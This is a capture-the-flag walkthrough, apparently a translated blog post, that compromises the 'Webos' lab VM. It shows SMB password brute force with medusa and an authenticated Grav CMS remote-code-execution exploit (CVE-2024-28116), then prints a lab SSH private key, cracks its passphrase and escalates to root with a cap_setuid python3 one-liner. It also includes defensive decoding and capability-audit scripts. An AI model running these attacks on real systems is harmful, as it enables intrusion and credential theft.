TheHackersLabs-Webos VM Walkthrough (WP)
城南花已开

Information Gathering

Service Discovery

The usual port 80, plus an additional SMB service on 445.

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.135 08:00:27:5f:a2:66 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:fd:82:05 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.059 seconds (124.33 hosts/sec). 4 responded
export ip=192.168.60.135
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.135:22
Open 192.168.60.135:80
Open 192.168.60.135:139
Open 192.168.60.135:445
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 14:40 CST
Initiating ARP Ping Scan at 14:40
Scanning 192.168.60.135 [1 port]
Completed ARP Ping Scan at 14:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:40
Completed Parallel DNS resolution of 1 host. at 14:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:40
Scanning 192.168.60.135 [4 ports]
Discovered open port 445/tcp on 192.168.60.135
Discovered open port 80/tcp on 192.168.60.135
Discovered open port 22/tcp on 192.168.60.135
Discovered open port 139/tcp on 192.168.60.135
Completed SYN Stealth Scan at 14:40, 0.05s elapsed (4 total ports)
Nmap scan report for 192.168.60.135
Host is up, received arp-response (0.00050s latency).
Scanned at 2025-01-04 14:40:40 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:5F:A2:66 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Let's first look at what's on port 80. There seem to be two layers of login forms.

Here, no matter what you enter, it redirects to /login, the second login form.


We can see that this site is built on the Grav CMS framework.

I tried SQL injection with no result.


A quick Google search turned up an RCE vulnerability, but exploiting it requires an account and password:

gunzf0x/Grav-CMS-RCE-Authenticated: a vulnerability in Grav CMS (versions below 1.7.45) that allows an authenticated user to execute code remotely - CVE-2024-28116


Let's try again to find some information on the SMB service.

But we have no access 🤨

❯ smbclient -N -L  //192.168.60.135

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
webos Disk Archivo compartido en Samba
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
❯ smbclient -N //192.168.60.135/webos
tree connect failed: NT_STATUS_ACCESS_DENIED
❯ smbclient -N //192.168.60.135/nobody
tree connect failed: NT_STATUS_ACCESS_DENIED

Brute-forcing the SMB service

With no other leads, brute force was the only option. Based on the VM name and the share name, I guessed the username is webos.

I don't know why hydra's SMB brute force was so slow here; it ran for ages without a result.

Switching to medusa got a hit instantly.

❯ medusa  -h 192.168.60.135 -u webos -P /usr/share/wordlists/rockyou.txt -M smbnt
ACCOUNT FOUND: [smbnt] Host: 192.168.60.135 User: webos Password: geraldine [SUCCESS (ADMIN$ - Share Unavailable)]

Connecting to SMB again

❯ smbclient -U webos //192.168.60.135/webos
Password for [WORKGROUP\webos]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 18 02:47:07 2024
.. D 0 Thu Jul 18 17:31:55 2024
MamaÑema.txt N 245 Thu Jul 18 02:47:07 2024

19480400 blocks of size 1024. 16306212 blocks available
smb: \> get MamaÑema.txt
getting file \MamaÑema.txt of size 245 as MamaÑema.txt (39.9 KiloBytes/sec) (average 39.9 KiloBytes/sec)
smb: \> quit
cat MamaÑema.txt
++++++++++[>++++++++++>++++++++++>+++++++++++>+++++++++++>+++++++++++>++++++>++++++++>++++++++++>+++++++++++>+++++++++++>++++++++++>+++++++++++>+++++>++++++>++++<<<<<<<<<<<<<<<-]>---.>.>-.>-----.>.>--.>.>+.>++++.>-----.>-.>+.>++++.>---.>++.....

We get a Brainfuck-encoded text.

Decoding it with an online tool gives the account admin:Perico69*****
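The decoding above was done with an online tool. As an added example (not part of the original writeup), here is a small Brainfuck interpreter in Python that runs the program recovered from MamaÑema.txt offline, so a recovered credential never has to be pasted into a third-party site, plus a heuristic for recognising Brainfuck-encoded files found on a share. The program constant is copied from the file contents shown above; the function names and the step limit are my own.

```python
# Added example (not part of the original writeup): decode the Brainfuck text from
# MamaÑema.txt locally instead of pasting a credential into an online decoder.

BF_CHARS = set("<>+-.,[]")

# The program recovered from the share, copied from the file contents above.
BF_PROGRAM = (
    "++++++++++[>++++++++++>++++++++++>+++++++++++>+++++++++++>+++++++++++"
    ">++++++>++++++++>++++++++++>+++++++++++>+++++++++++>++++++++++>+++++++++++"
    ">+++++>++++++>++++<<<<<<<<<<<<<<<-]"
    ">---.>.>-.>-----.>.>--.>.>+.>++++.>-----.>-.>+.>++++.>---.>++....."
)


def looks_like_brainfuck(text: str, threshold: float = 0.9) -> bool:
    """Heuristic: a file is Brainfuck-like when nearly all non-space characters
    come from the eight-symbol alphabet and it contains at least one loop."""
    body = "".join(text.split())
    if not body or "[" not in body:
        return False
    return sum(c in BF_CHARS for c in body) / len(body) >= threshold


def run_brainfuck(program: str, max_steps: int = 1_000_000) -> str:
    """Interpret `program` and return everything it writes with '.'.
    Cells are 8-bit and wrap; ',' reads 0 so no stdin is needed; a step limit
    guards against a buggy or hostile program that never terminates."""
    jump = {}
    stack = []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = [0] * 30000
    ptr = pc = steps = 0
    out = bytearray()
    while pc < len(program):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = program[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif ch == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved below cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return out.decode("latin-1")


def decode_credential(text: str):
    """Run the program and split its output on the first ':' into (user, password)."""
    plain = run_brainfuck(text)
    user, sep, password = plain.partition(":")
    return (user, password) if sep else (plain, "")


if __name__ == "__main__":
    print("brainfuck-like:", looks_like_brainfuck(BF_PROGRAM))
    print("decoded:", run_brainfuck(BF_PROGRAM))
```

The trailing `.....` in the program is not truncation: it prints the last cell five times, so the five asterisks are literally part of the decoded password, which is why the same string appears unchanged in the exploit command later in the writeup.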


We can scan for directories to find the admin login path.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.135
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.60.135/images/]
/home (Status: 200) [Size: 12282]
/login (Status: 200) [Size: 13646]
/user (Status: 301) [Size: 315] [--> http://192.168.60.135/user/]
/assets (Status: 301) [Size: 317] [--> http://192.168.60.135/assets/]
/admin (Status: 200) [Size: 11127]
/bin (Status: 301) [Size: 314] [--> http://192.168.60.135/bin/]
/system (Status: 301) [Size: 317] [--> http://192.168.60.135/system/]
/cache (Status: 301) [Size: 316] [--> http://192.168.60.135/cache/]
/vendor (Status: 301) [Size: 317] [--> http://192.168.60.135/vendor/]
/backup (Status: 301) [Size: 317] [--> http://192.168.60.135/backup/]
/logs (Status: 301) [Size: 315] [--> http://192.168.60.135/logs/]
/forgot_password (Status: 200) [Size: 11763]
/tmp (Status: 301) [Size: 314] [--> http://192.168.60.135/tmp/]
/http%3a (Status: 200) [Size: 12282]
/**http%3a (Status: 200) [Size: 12282]
/*http%3a (Status: 200) [Size: 12282]
/user_profile (Status: 200) [Size: 13653]
/%c0 (Status: 200) [Size: 12282]
/server-status (Status: 403) [Size: 279]
/%3frid%3d2671 (Status: 500) [Size: 258358]
/%cf (Status: 200) [Size: 12282]
/%cb (Status: 200) [Size: 12282]
/%ca (Status: 200) [Size: 12282]
/%cd (Status: 200) [Size: 12282]
/%d1 (Status: 200) [Size: 12282]
/%d0 (Status: 200) [Size: 12282]
/%d4 (Status: 200) [Size: 12282]
/%d7 (Status: 200) [Size: 12282]
/%d8 (Status: 200) [Size: 12282]
/%d2 (Status: 200) [Size: 12282]
/%cc (Status: 200) [Size: 12282]
/%c9 (Status: 200) [Size: 12282]
/%c1 (Status: 200) [Size: 12282]
/%c8 (Status: 200) [Size: 12282]
/%d5 (Status: 200) [Size: 12282]
/%d6 (Status: 200) [Size: 12282]
/%d3 (Status: 200) [Size: 12282]
/%ce (Status: 200) [Size: 12282]
/%c2 (Status: 200) [Size: 12282]
/%c7 (Status: 200) [Size: 12282]
/%c5 (Status: 200) [Size: 12282]
/%c4 (Status: 200) [Size: 12282]
/%c3 (Status: 200) [Size: 12282]
/%c6 (Status: 200) [Size: 12282]
/%d9 (Status: 200) [Size: 12282]
/%de (Status: 200) [Size: 12282]
/%dd (Status: 200) [Size: 12282]
/%df (Status: 200) [Size: 12282]
/%db (Status: 200) [Size: 12282]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

Logging in to the admin panel at /admin with that password, we can see the current version is 1.7.44.


This version has an XSS vulnerability, and since it is below the version required by the script above, that can be used as well.

Arbitrary Command Execution

Let's try it. By default the script deletes the file it generates, so we need to add the --no-delete-file option.

❯ python3 Grav_CMS_RCE.py -t 192.168.60.135 -u 'admin' -p 'Perico69*****' -x 'id' --no-delete-file
[*] Attacking 'http://192.168.60.135:80'...
[*] Uploading payload...
[*] Executing payload...
[*] Payload uploaded. Visit 'http://192.168.60.135:80/b3bpro2uab' to see the command execution output

Visiting the URL, the command executes normally.


Back in the admin panel, we can see a new file has been generated.


For some reason, though, I couldn't get a reverse shell back, so I could only edit the id command in this file by hand, test bit by bit and preview the result.

When I ran ls /opt, I found a private key file in that directory.

So I simply changed it to cat /opt/id_rsa


User Privilege Escalation

We have the private key file:

-----BEGIN OPENSSH PRIVATE KEY-----
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
ezFLIVT0OZPkK1bB3I2tLpXi0=
-----END OPENSSH PRIVATE KEY-----

The private key is passphrase-protected; cracking it gives freestyle.

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=passwd
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
freestyle (id_rsa)
1g 0:00:00:00 DONE (2025-01-04 17:09) 5.000g/s 5.000p/s 5.000c/s 5.000C/s freestyle
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

SSH in

❯ ssh webos@192.168.60.135 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux TheHackersLabs-Webos 6.1.0-22-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.94-1 (2024-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 11:45:53 2024 from 192.168.18.19
webos@TheHackersLabs-Webos:~$ ls
python3 user.txt webito
webos@TheHackersLabs-Webos:~$ cat user.txt
efca2461d0ccdf0ab78bfbbc93e1efe9 -

Root Privilege Escalation

Information gathering again

Linux Capabilities - HackTricks

The python3 in the home directory has been granted cap_setuid. Simply put, Python can be used to change its own UID.

webos@TheHackersLabs-Webos:~$ /sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/home/webos/python3 cap_setuid=ep

Traditionally, privilege management in Linux relied on user and group identities, with root as the most privileged user holding every permission on the system. This approach has problems, though: when a program needs to perform certain privileged operations (such as accessing the network or manipulating the file system), it may have to run as root, which increases the security risk.

Capabilities allow the traditional root privilege to be divided into multiple small, controllable permissions (the "capabilities") that are assigned to specific processes or programs, instead of giving the whole program root privileges.

Each process can use these capabilities to perform specific operations without holding full root privileges. That way, even if a program is exploited by an attacker, the attacker does not obtain full root but is limited to the operations covered by the assigned capabilities, which improves the security of the system.
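As an added example (not from the original writeup), the following Python script parses `getcap -r /` output like the two lines above and flags file capabilities that a defender should treat as equivalent to root. cap_setuid on a general-purpose interpreter sitting in a home directory, as on this VM, hands root to anyone who can run that binary, which is exactly the situation the explanation above says capabilities are meant to avoid. The sample input is the page's own two getcap lines; the root-equivalent capability list, the interpreter pattern, and the allow-list of expected (path, capability) pairs are my own assumptions and should be adjusted to the distribution's baseline.

```python
# Added example (not from the original writeup): audit `getcap -r /` output for
# file capabilities that are effectively root. Risk lists and the allow-list are
# my own assumptions, not a standard.
import re
from dataclasses import dataclass, field

# Constructed sample: the two lines the writeup obtained on the VM.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/ping cap_net_raw=ep
/home/webos/python3 cap_setuid=ep
"""

# Capabilities that let the holder become or act as root (assumption: common audit list).
ROOT_EQUIVALENT_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner", "cap_sys_rawio",
}
# Directories where distribution-managed binaries normally live.
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")
# Interpreter basenames: a capability on these applies to any code they run.
INTERPRETER_RE = re.compile(r"(python|perl|ruby|php|node|lua)[0-9.]*")
# Allow-list of path -> capabilities a baseline install is expected to carry (assumption).
EXPECTED = {"/usr/bin/ping": {"cap_net_raw"}}


@dataclass
class Finding:
    path: str
    caps: set
    reasons: list = field(default_factory=list)


def parse_getcap_line(line: str):
    """Return (path, {cap names}) for one getcap line, or None for a blank line.
    Handles both the old "path = cap_x+ep" and the new "path cap_x=ep" layouts."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:
        path, capstr = line.split(" = ", 1)
    else:
        path, capstr = line.split(None, 1)  # assumes no whitespace in the path
    caps = set()
    for clause in capstr.split():
        # "cap_a,cap_b+eip" / "cap_a=ep": names come before the first flag operator
        names = re.split(r"[=+-]", clause, maxsplit=1)[0]
        caps.update(n for n in names.split(",") if n)
    return path, caps


def audit_getcap(output: str):
    """Flag every file whose capabilities go beyond the allow-list and explain why."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps = parsed
        unexpected = caps - EXPECTED.get(path, set())
        if not unexpected:
            continue
        reasons = []
        risky = unexpected & ROOT_EQUIVALENT_CAPS
        if risky:
            reasons.append("root-equivalent capability: " + ", ".join(sorted(risky)))
        if not path.startswith(SYSTEM_DIRS):
            reasons.append("binary lives outside the system binary directories")
        if INTERPRETER_RE.fullmatch(path.rsplit("/", 1)[-1]):
            reasons.append("general-purpose interpreter: the capability applies to any code it runs")
        if not reasons:
            reasons.append("capability not on the allow-list")
        findings.append(Finding(path, caps, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP_OUTPUT):
        print(f"{f.path} {sorted(f.caps)}")
        for r in f.reasons:
            print("  -", r)
```

Run on the VM's output, the ping entry is silently accepted while the home-directory python3 is reported with all three reasons; feeding the script the output of a scheduled `getcap -r /` run (or comparing against a stored baseline) turns this one-off check into a simple drift detector for stray file capabilities.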

webos@TheHackersLabs-Webos:~$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1001(webos) grupos=1001(webos),1002(webito)
# cd /root
# ls
root.txt
# cat root.txt
46510507fb8a261ee8cafee6ff6ad368 -